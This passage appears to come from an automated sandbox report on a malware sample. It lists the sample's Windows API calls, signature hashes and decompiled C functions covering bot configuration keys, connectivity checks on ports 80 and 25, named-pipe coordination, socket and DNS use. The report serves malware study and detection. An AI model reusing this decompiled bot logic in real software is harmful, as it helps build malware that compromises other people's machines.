                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00E32071
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00E32082
                                                                                • GetTickCount.KERNEL32 ref: 00E32230
                                                                                  • Part of subcall function 00E31E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 00E31E7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                • API String ID: 4207808166-1391650218
                                                                                • Opcode ID: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction ID: a1db0ba0bbd13a64a521efe89adb46942bbcad83b6a9b5615ac5858b48e7d099
                                                                                • Opcode Fuzzy Hash: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction Fuzzy Hash: 5651A5B0900344AFE330AF758C8EF67BEECEB54708F00591DFA96A2252D7B5A944C765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00402011() {
                                                                                				long _t35;
                                                                                				void* _t45;
                                                                                				intOrPtr _t47;
                                                                                				void* _t51;
                                                                                				char* _t53;
                                                                                				char* _t58;
                                                                                				intOrPtr _t96;
                                                                                				signed int _t102;
                                                                                				signed int _t103;
                                                                                				void* _t104;
                                                                                				void* _t122;
                                                                                
                                                                                				if(( *0x4122f4 & 0x00000001) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000001;
                                                                                					 *0x4122f0 = E0040F04E(0);
                                                                                				}
                                                                                				if(( *0x4122f4 & 0x00000002) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000002;
                                                                                					 *0x4122ec = E0040F04E(0);
                                                                                				}
                                                                                				if(( *0x4122f4 & 0x00000004) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000004;
                                                                                					 *0x4122e8 = E0040F04E(0);
                                                                                				}
                                                                                				_t35 = GetTickCount();
                                                                                				_t96 =  *((intOrPtr*)(_t104 + 0x114));
                                                                                				if(_t35 -  *0x4122e0 > 0xdbba0) {
                                                                                					_t58 =  *0x412000; // 0x410288
                                                                                					_t103 = 0;
                                                                                					if( *_t58 != 0) {
                                                                                						_t60 = 0x412000;
                                                                                						do {
                                                                                							if(E00402684( *_t60) == 0) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
                                                                                								if(E00401978(_t61, 0x50) != 0) {
                                                                                									_t12 = _t96 + 0x14;
                                                                                									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
                                                                                									__eflags =  *_t12;
                                                                                								} else {
                                                                                									goto L11;
                                                                                								}
                                                                                							}
                                                                                							goto L14;
                                                                                							L11:
                                                                                							_t103 = _t103 + 1;
                                                                                							_t60 = 0x412000 + _t103 * 4;
                                                                                						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
                                                                                					}
                                                                                					L14:
                                                                                					 *0x4122e0 = GetTickCount();
                                                                                				}
                                                                                				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
                                                                                					_t53 =  *0x412000; // 0x410288
                                                                                					_t102 = 0;
                                                                                					if( *_t53 != 0) {
                                                                                						_t55 = 0x412000;
                                                                                						do {
                                                                                							if(E00402EF8( *_t55) == 0) {
                                                                                								goto L20;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
                                                                                								if(E00401978(_t56, 0x19) != 0) {
                                                                                									_t18 = _t96 + 0x14;
                                                                                									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
                                                                                									__eflags =  *_t18;
                                                                                								} else {
                                                                                									goto L20;
                                                                                								}
                                                                                							}
                                                                                							goto L23;
                                                                                							L20:
                                                                                							_t102 = _t102 + 1;
                                                                                							_t55 = 0x412000 + _t102 * 4;
                                                                                						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
                                                                                					}
                                                                                					L23:
                                                                                					 *0x4122dc = GetTickCount();
                                                                                				}
                                                                                				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
                                                                                				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
                                                                                				_t45 = E0040F04E(0) -  *0x4122f0;
                                                                                				_t93 = "localcfg";
                                                                                				_t122 = _t45 -  *0x4122e4; // 0x0
                                                                                				if(_t122 > 0) {
                                                                                					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
                                                                                					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
                                                                                					_t104 = _t104 + 0x28;
                                                                                					if(_t51 == 0) {
                                                                                						L28:
                                                                                						 *0x4122e4 = 0x12c;
                                                                                					} else {
                                                                                						_t124 =  *((intOrPtr*)(_t104 + 0x10));
                                                                                						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							_push(_t104 + 0x10);
                                                                                							_push(_t51);
                                                                                							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
                                                                                							 *0x4122e4 = 0x4b0;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t47 = E0040F04E(0) -  *0x4122f0;
                                                                                				if(_t47 > 0x4b0) {
                                                                                					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
                                                                                					_t47 = E0040F04E(0);
                                                                                					 *0x4122f0 = _t47;
                                                                                				}
                                                                                				return _t47;
                                                                                			}

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402078
                                                                                • GetTickCount.KERNEL32 ref: 004020D4
                                                                                • GetTickCount.KERNEL32 ref: 004020DB
                                                                                • GetTickCount.KERNEL32 ref: 0040212B
                                                                                • GetTickCount.KERNEL32 ref: 00402132
                                                                                • GetTickCount.KERNEL32 ref: 00402142
                                                                                  • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                  • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                  • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                  • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                  • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040405E(void* __ecx) {
                                                                                				unsigned int _v8;
                                                                                				unsigned int _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v40;
                                                                                				void* _t40;
                                                                                				void* _t43;
                                                                                				void* _t49;
                                                                                				void* _t56;
                                                                                				void* _t62;
                                                                                				void* _t64;
                                                                                				long _t71;
                                                                                				void* _t82;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t95;
                                                                                				void* _t97;
                                                                                				void* _t98;
                                                                                				void* _t99;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                
                                                                                				_t95 = __ecx;
                                                                                				_v8 = 0;
                                                                                				_t40 = CreateEventA(0, 1, 1, 0);
                                                                                				_v16 = _t40;
                                                                                				if(_t40 != 0) {
                                                                                					_t43 = E00404000(E00403ECD(_t95),  &_v20);
                                                                                					_t97 = _t98;
                                                                                					_t102 = 0x7d0;
                                                                                					_t92 = 0x100;
                                                                                					_t99 = 0x4122f8;
                                                                                					if(_t43 == 0) {
                                                                                						L10:
                                                                                						E0040EE2A(_t97, _t99, 0, _t92);
                                                                                						_t104 = _t103 + 0xc;
                                                                                						_t93 = 0xa;
                                                                                						while(1) {
                                                                                							_t93 = _t93 - 1;
                                                                                							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
                                                                                							if(_t99 != 0xffffffff) {
                                                                                								break;
                                                                                							}
                                                                                							Sleep(0x1f4);
                                                                                							if(_t93 != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							CloseHandle(_v16);
                                                                                							return 0;
                                                                                						}
                                                                                						L14:
                                                                                						while(1) {
                                                                                							do {
                                                                                								L14:
                                                                                								while(1) {
                                                                                									do {
                                                                                										if(ConnectNamedPipe(_t99, 0) != 0) {
                                                                                											goto L16;
                                                                                										}
                                                                                										_t71 = GetLastError();
                                                                                										asm("sbb eax, eax");
                                                                                										if( ~(_t71 - 0x217) + 1 == 0) {
                                                                                											L25:
                                                                                											DisconnectNamedPipe(_t99);
                                                                                											continue;
                                                                                										}
                                                                                										L16:
                                                                                										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
                                                                                										_t104 = _t104 + 0x14;
                                                                                									} while (_t49 == 0);
                                                                                									_t92 = _v16;
                                                                                									_v8 = (_v12 >> 2) + _v12;
                                                                                									E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
                                                                                									_t104 = _t104 + 0x28;
                                                                                									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
                                                                                										goto L25;
                                                                                									} else {
                                                                                										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
                                                                                										_t104 = _t104 + 0x14;
                                                                                										if(_t62 == 0 || _v24 != 0xc) {
                                                                                											goto L25;
                                                                                										} else {
                                                                                											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
                                                                                											_t104 = _t104 + 0x14;
                                                                                											if(_t64 == 0) {
                                                                                												goto L25;
                                                                                											}
                                                                                											break;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							} while (_v28 != 1);
                                                                                							E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                							_t103 = _t104 + 0x14;
                                                                                							if(_v32 == 0) {
                                                                                								_t102 = CloseHandle;
                                                                                								CloseHandle(_t99);
                                                                                								CloseHandle(_t92);
                                                                                								E0040E318();
                                                                                								L8:
                                                                                								ExitProcess(0);
                                                                                							}
                                                                                							 *0x41215a =  *0x41215a + 1;
                                                                                						}
                                                                                					}
                                                                                					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
                                                                                					_t103 = _t103 + 0xc;
                                                                                					if(_v20 == 0xffffffff) {
                                                                                						goto L10;
                                                                                					}
                                                                                					_v12 = E0040ECA5();
                                                                                					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
                                                                                					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                					_t103 = _t103 + 0x28;
                                                                                					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
                                                                                						CloseHandle(_v20);
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_v8 = _v8 + (_v8 >> 2);
                                                                                						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                						_t103 = _t103 + 0x14;
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}
                                                                                0x004041b6
                                                                                0x004041bb
                                                                                0x004041be
                                                                                0x004041c5
                                                                                0x004041d0
                                                                                0x004041da
                                                                                0x004041e8
                                                                                0x004041ed
                                                                                0x004041f2
                                                                                0x00000000
                                                                                0x00404202
                                                                                0x0040420b
                                                                                0x00404210
                                                                                0x00404215
                                                                                0x00000000
                                                                                0x0040421d
                                                                                0x00404226
                                                                                0x0040422b
                                                                                0x00404230
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404230
                                                                                0x00404215
                                                                                0x004041f2
                                                                                0x00404232
                                                                                0x00404245
                                                                                0x0040424a
                                                                                0x00404251
                                                                                0x0040426a
                                                                                0x00404271
                                                                                0x00404274
                                                                                0x00404276
                                                                                0x0040411f
                                                                                0x00404121
                                                                                0x00404121
                                                                                0x00404253
                                                                                0x00404253
                                                                                0x00404188
                                                                                0x004040b2
                                                                                0x004040b7
                                                                                0x004040be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004040c9
                                                                                0x004040d5
                                                                                0x004040e7
                                                                                0x004040ec
                                                                                0x004040f1
                                                                                0x0040412a
                                                                                0x00000000
                                                                                0x00404101
                                                                                0x0040410b
                                                                                0x00404117
                                                                                0x0040411c
                                                                                0x00000000
                                                                                0x0040411c
                                                                                0x004040f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                • ExitProcess.KERNEL32 ref: 00404121
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID:
                                                                                • API String ID: 2404124870-0
                                                                                • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040C2DC(void* __ebp, signed int _a4) {
                                                                                				void* _t86;
                                                                                				signed int _t90;
                                                                                				signed int _t91;
                                                                                				long _t93;
                                                                                				signed int _t95;
                                                                                				signed int _t101;
                                                                                				signed int _t108;
                                                                                				signed int _t112;
                                                                                				signed int _t115;
                                                                                				long _t117;
                                                                                				long _t118;
                                                                                				signed int _t120;
                                                                                				struct _SECURITY_ATTRIBUTES* _t122;
                                                                                				signed int _t123;
                                                                                				signed int _t132;
                                                                                				signed int _t148;
                                                                                				signed char _t151;
                                                                                				signed int _t154;
                                                                                				signed int _t156;
                                                                                				signed char* _t157;
                                                                                				void* _t158;
                                                                                				signed int _t163;
                                                                                
                                                                                				_t158 = __ebp;
                                                                                				_t157 = _a4;
                                                                                				E0040A4C7(_t157);
                                                                                				_t122 = 0;
                                                                                				if(_t157[0x44] == 0) {
                                                                                					_t157[8] = 0;
                                                                                					_t157[0x34] = 0;
                                                                                					_t157[0x38] = 0;
                                                                                					_t157[0x3c] = 0;
                                                                                					_t157[0x54] = 0;
                                                                                					_t157[0x40] = 0;
                                                                                					_t157[0x58] = 0;
                                                                                					L31:
                                                                                					_t82 =  &(_t157[4]); // 0x40c4e4
                                                                                					_t86 = _t82;
                                                                                					_t148 =  !( *_t157) & 0x00000001;
                                                                                					_t157[0x5c] = _t122;
                                                                                					_t84 =  &(_t157[8]); // 0xfffffdf0
                                                                                					if( *_t86 >=  *_t84) {
                                                                                						L34:
                                                                                						return _t86;
                                                                                					}
                                                                                					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
                                                                                					if(_t86 == _t122) {
                                                                                						goto L34;
                                                                                					}
                                                                                					return CloseHandle(_t86);
                                                                                				}
                                                                                				if(_t157[8] != 0) {
                                                                                					__eflags = _t157[0x48];
                                                                                					if(_t157[0x48] == 0) {
                                                                                						L5:
                                                                                						_t12 =  &(_t157[0x10]); // 0x59be026a
                                                                                						_t90 =  *_t12;
                                                                                						_t157[8] = _t90;
                                                                                						_t157[0x34] = _t90;
                                                                                						_t91 = _t90 * 0x3e8;
                                                                                						__eflags = _t91;
                                                                                						_t157[0x38] = _t122;
                                                                                						_t157[0x3c] = _t122;
                                                                                						_t157[0x1c] = _t90 * 0x2710;
                                                                                						_t157[0x20] = _t91;
                                                                                						goto L6;
                                                                                					}
                                                                                					_t118 = GetTickCount();
                                                                                					_t11 =  &(_t157[0x48]); // 0x13740041
                                                                                					__eflags = _t118 -  *_t11 - 0x927c0;
                                                                                					if(_t118 -  *_t11 < 0x927c0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t4 =  &(_t157[0xc]); // 0x5756c359
                                                                                					_t120 =  *_t4;
                                                                                					_t157[0x1c] = _t120 * 0x2710;
                                                                                					_t157[8] = _t120;
                                                                                					_t157[0x20] = _t120 * 0x3e8;
                                                                                					_t157[0x34] = _t120;
                                                                                					_t157[0x48] = GetTickCount();
                                                                                					L6:
                                                                                					if(( *_t157 & 0x00000001) == 0) {
                                                                                						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t157[8] =  *_t73;
                                                                                						goto L31;
                                                                                					}
                                                                                					_t93 = GetTickCount();
                                                                                					_t21 =  &(_t157[0x4c]); // 0x26fce850
                                                                                					if(_t93 -  *_t21 >= 0x2710) {
                                                                                						goto L31;
                                                                                					}
                                                                                					if(_t157[0x54] == _t122) {
                                                                                						_t95 = 0x3e8;
                                                                                					} else {
                                                                                						_t117 = GetTickCount();
                                                                                						_t23 =  &(_t157[0x54]); // 0x41366c1d
                                                                                						_t95 = _t117 -  *_t23;
                                                                                					}
                                                                                					_t123 = _t95;
                                                                                					if(_t95 < 1) {
                                                                                						_t123 = 1;
                                                                                					}
                                                                                					if(_t123 > 0x4e20) {
                                                                                						_t123 = 0x4e20;
                                                                                					}
                                                                                					_t24 =  &(_t157[0x58]); // 0x701d8900
                                                                                					_t25 =  &(_t157[0x40]); // 0x74c33b57
                                                                                					_t151 =  *_t25;
                                                                                					_t132 =  *_t24 * 0x3e8;
                                                                                					_push(_t158);
                                                                                					asm("cdq");
                                                                                					_push(0x14);
                                                                                					_a4 = _t123;
                                                                                					asm("cdq");
                                                                                					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
                                                                                					if(_t101 == 0) {
                                                                                						__eflags = _t132 - _t151;
                                                                                						if(__eflags == 0) {
                                                                                							goto L22;
                                                                                						}
                                                                                						if(__eflags >= 0) {
                                                                                							_t156 = _t151 + 1;
                                                                                							__eflags = _t156;
                                                                                						} else {
                                                                                							_t156 = _t151 - 1;
                                                                                						}
                                                                                						goto L21;
                                                                                					} else {
                                                                                						_t156 = _t151 + _t101;
                                                                                						L21:
                                                                                						_t157[0x40] = _t156;
                                                                                						L22:
                                                                                						if(_t157[0x40] < 0) {
                                                                                							_t157[0x40] = _t157[0x40] & 0x00000000;
                                                                                						}
                                                                                						_t39 =  &(_t157[0x40]); // 0x74c33b57
                                                                                						_t163 = (0xc8 -  *_t39) * 0x14;
                                                                                						if(_t123 > 0x3e8) {
                                                                                							_a4 = 0x3e8;
                                                                                						}
                                                                                						asm("cdq");
                                                                                						_t46 =  &(_t157[0x14]); // 0x5f004120
                                                                                						_t47 =  &(_t157[0x10]); // 0x59be026a
                                                                                						asm("cdq");
                                                                                						_t49 =  &(_t157[0x30]); // 0xe4754f45
                                                                                						_t54 =  &(_t157[0x20]); // 0x406a0000
                                                                                						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t56 =  &(_t157[0x2c]); // 0xc68314c4
                                                                                						_t157[0x20] = _t108;
                                                                                						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t122 = 0;
                                                                                						_t157[0x58] = 0;
                                                                                						_t154 = _t112 / 0x3e8;
                                                                                						_t157[0x54] = GetTickCount();
                                                                                						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t115 =  *_t68;
                                                                                						if(_t115 <= _t154) {
                                                                                							_t157[8] = _t115;
                                                                                							_t157[0x20] = _t115 * 0x3e8;
                                                                                						} else {
                                                                                							_t157[8] = _t154;
                                                                                							_t157[0x1c] = _t154 * 0x2710;
                                                                                						}
                                                                                						goto L31;
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                0x0040c2dc
                                                                                0x0040c2de
                                                                                0x0040c2e4
                                                                                0x0040c2e9
                                                                                0x0040c2ef
                                                                                0x0040c482
                                                                                0x0040c485
                                                                                0x0040c488
                                                                                0x0040c48b
                                                                                0x0040c48e
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c497
                                                                                0x0040c499
                                                                                0x0040c499
                                                                                0x0040c4a0
                                                                                0x0040c4a3
                                                                                0x0040c4a6
                                                                                0x0040c4a9
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4c1
                                                                                0x0040c4c9

                                                                                APIs
                                                                                  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                • GetTickCount.KERNEL32 ref: 0040C363
                                                                                • GetTickCount.KERNEL32 ref: 0040C378
                                                                                • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 00E33068
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00E33078
                                                                                • GetProcAddress.KERNEL32(00000000,00410408), ref: 00E33095
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E330B6
                                                                                • htons.WS2_32(00000035), ref: 00E330EF
                                                                                • inet_addr.WS2_32(?), ref: 00E330FA
                                                                                • gethostbyname.WS2_32(?), ref: 00E3310D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00E3314D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: iphlpapi.dll
                                                                                • API String ID: 2869546040-3565520932
                                                                                • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction ID: d2312996abc0ea80514cb37dd93df5bbfe80191a390ec0bbd1d0750e941e3ba0
                                                                                • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction Fuzzy Hash: 7231B631A0120AABDB119BB89C4CEAE7FB8EF04765F145225F518F7290DB74DE41CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?), ref: 00E395A7
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00E395D5
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00E395DC
                                                                                • wsprintfA.USER32 ref: 00E39635
                                                                                • wsprintfA.USER32 ref: 00E39673
                                                                                • wsprintfA.USER32 ref: 00E396F4
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 00E39758
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00E3978D
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00E397D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID:
                                                                                • API String ID: 3696105349-0
                                                                                • Opcode ID: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction ID: 22bf90bc166a507d754f66f2721182d462a41ce5081d74e1a321b0989e7176ec
                                                                                • Opcode Fuzzy Hash: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction Fuzzy Hash: 55A16EB1900208EFEB25DFA0DC89FDA3FACEB45341F105066FA15E6152E7B5D984CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00402D21(intOrPtr _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				void* _v16;
                                                                                				char _v28;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				_Unknown_base(*)()* _t20;
                                                                                				long* _t30;
                                                                                				intOrPtr* _t37;
                                                                                				long _t39;
                                                                                				long _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsw");
                                                                                				asm("movsb");
                                                                                				_t19 = GetModuleHandleA( &_v28);
                                                                                				_t39 = 0;
                                                                                				if(_t19 != 0) {
                                                                                					L3:
                                                                                					_t20 = GetProcAddress(_t19, "DnsQuery_A");
                                                                                					if(_t20 == _t39) {
